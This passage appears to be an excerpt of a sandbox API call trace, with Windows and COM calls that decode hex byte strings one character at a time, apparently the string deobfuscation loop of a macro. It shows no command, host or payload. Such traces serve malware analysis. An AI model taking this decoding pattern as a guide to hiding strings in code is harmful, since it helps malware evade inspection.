[0175.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0175.016] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.016] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.016] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.016] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.016] GetUserDefaultLCID () returned 0x409 [0175.016] malloc (_Size=0xa0) returned 0x11f50080 [0175.017] free (_Block=0x11f50080) [0175.017] VarBstrCat (in: bstrLeft="&H", bstrRight="c2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.017] GetUserDefaultLCID () returned 0x409 [0175.017] VarI2FromStr (in: strIn="&Hc2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.017] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.017] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.017] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.017] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.018] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.018] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.018] GetUserDefaultLCID () returned 0x409 [0175.018] malloc (_Size=0xa0) returned 0x11f50080 [0175.018] free (_Block=0x11f50080) [0175.019] VarBstrCat (in: bstrLeft="&H", bstrRight="ba", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.019] GetUserDefaultLCID () returned 0x409 [0175.019] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.019] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0175.019] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.019] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.019] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.019] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.019] GetUserDefaultLCID () returned 0x409 [0175.019] malloc (_Size=0xa0) returned 0x11f50080 [0175.019] free (_Block=0x11f50080) [0175.020] VarBstrCat (in: bstrLeft="&H", bstrRight="b5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.020] GetUserDefaultLCID () returned 0x409 [0175.020] VarI2FromStr (in: strIn="&Hb5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.020] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.020] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.020] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.020] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.020] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.020] GetUserDefaultLCID () returned 0x409 [0175.021] malloc (_Size=0xa0) returned 0x11f50080 [0175.021] free (_Block=0x11f50080) [0175.021] VarBstrCat (in: bstrLeft="&H", bstrRight="a8", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.021] GetUserDefaultLCID () returned 0x409 [0175.021] VarI2FromStr (in: strIn="&Ha8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.021] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0175.021] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.021] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.022] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.022] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.022] GetUserDefaultLCID () returned 0x409 [0175.022] malloc (_Size=0xa0) returned 0x11f50080 [0175.022] free (_Block=0x11f50080) [0175.022] VarBstrCat (in: bstrLeft="&H", bstrRight="cd", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.022] GetUserDefaultLCID () returned 0x409 [0175.022] VarI2FromStr (in: strIn="&Hcd", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.022] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.023] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.023] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.023] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.023] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.023] GetUserDefaultLCID () returned 0x409 [0175.023] malloc (_Size=0xa0) returned 0x11f50080 [0175.023] free (_Block=0x11f50080) [0175.023] VarBstrCat (in: bstrLeft="&H", bstrRight="b8", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.023] VarI2FromStr (in: strIn="&Hb8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.024] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0175.024] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.024] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.024] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.024] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.024] malloc (_Size=0xa0) returned 0x11f50080 [0175.024] free (_Block=0x11f50080) [0175.025] VarBstrCat (in: bstrLeft="&H", bstrRight="e0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.025] GetUserDefaultLCID () returned 0x409 [0175.025] VarI2FromStr (in: strIn="&He0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.025] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0175.025] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.025] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.025] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.025] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.026] GetUserDefaultLCID () returned 0x409 [0175.026] malloc (_Size=0xa0) returned 0x11f50080 [0175.026] free (_Block=0x11f50080) [0175.026] VarBstrCat (in: bstrLeft="&H", bstrRight="a4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.026] GetUserDefaultLCID () returned 0x409 [0175.026] VarI2FromStr (in: strIn="&Ha4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.026] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0175.027] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.027] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.027] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.027] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.027] GetUserDefaultLCID () returned 0x409 [0175.027] malloc (_Size=0xa0) returned 0x11f50080 [0175.027] free (_Block=0x11f50080) [0175.028] VarBstrCat (in: bstrLeft="&H", bstrRight="c5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.028] GetUserDefaultLCID () returned 0x409 [0175.028] VarI2FromStr (in: strIn="&Hc5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.028] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.028] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.028] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.028] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.028] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.028] GetUserDefaultLCID () returned 0x409 [0175.028] malloc (_Size=0xa0) returned 0x11f50080 [0175.028] free (_Block=0x11f50080) [0175.029] VarBstrCat (in: bstrLeft="&H", bstrRight="d4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.029] GetUserDefaultLCID () returned 0x409 [0175.029] VarI2FromStr (in: strIn="&Hd4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.029] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.029] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.029] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.029] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.029] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.029] GetUserDefaultLCID () returned 0x409 [0175.030] malloc (_Size=0xa0) returned 0x11f50080 [0175.030] free (_Block=0x11f50080) [0175.030] VarBstrCat (in: bstrLeft="&H", bstrRight="b0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.030] GetUserDefaultLCID () returned 0x409 [0175.030] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.030] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0175.031] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.031] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.031] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.031] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.031] GetUserDefaultLCID () returned 0x409 [0175.031] malloc (_Size=0xa0) returned 0x11f50080 [0175.031] free (_Block=0x11f50080) [0175.031] VarBstrCat (in: bstrLeft="&H", bstrRight="a7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.031] GetUserDefaultLCID () returned 0x409 [0175.031] VarI2FromStr (in: strIn="&Ha7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.032] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.032] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.032] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.032] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.032] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.032] GetUserDefaultLCID () returned 0x409 [0175.032] malloc (_Size=0xa0) returned 0x11f50080 [0175.032] free (_Block=0x11f50080) [0175.033] VarBstrCat (in: bstrLeft="&H", bstrRight="b7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.033] GetUserDefaultLCID () returned 0x409 [0175.033] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.033] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0175.033] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.033] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.033] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.033] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.033] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.033] GetUserDefaultLCID () returned 0x409 [0175.033] malloc (_Size=0xa0) returned 0x11f50080 [0175.033] free (_Block=0x11f50080) [0175.034] VarBstrCat (in: bstrLeft="&H", bstrRight="cb", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.034] GetUserDefaultLCID () returned 0x409 [0175.034] VarI2FromStr (in: strIn="&Hcb", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.034] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0175.034] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.034] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.034] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.034] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.034] GetUserDefaultLCID () returned 0x409 [0175.035] malloc (_Size=0xa0) returned 0x11f50080 [0175.035] free (_Block=0x11f50080) [0175.035] VarBstrCat (in: bstrLeft="&H", bstrRight="c1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.035] GetUserDefaultLCID () returned 0x409 [0175.035] VarI2FromStr (in: strIn="&Hc1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.035] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0175.035] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.035] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.036] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.036] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.036] GetUserDefaultLCID () returned 0x409 [0175.036] malloc (_Size=0xa0) returned 0x11f50080 [0175.036] free (_Block=0x11f50080) [0175.036] VarBstrCat (in: bstrLeft="&H", bstrRight="9c", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.036] GetUserDefaultLCID () returned 0x409 [0175.036] VarI2FromStr (in: strIn="&H9c", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.036] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0175.037] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.037] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.037] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.037] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.037] GetUserDefaultLCID () returned 0x409 [0175.037] malloc 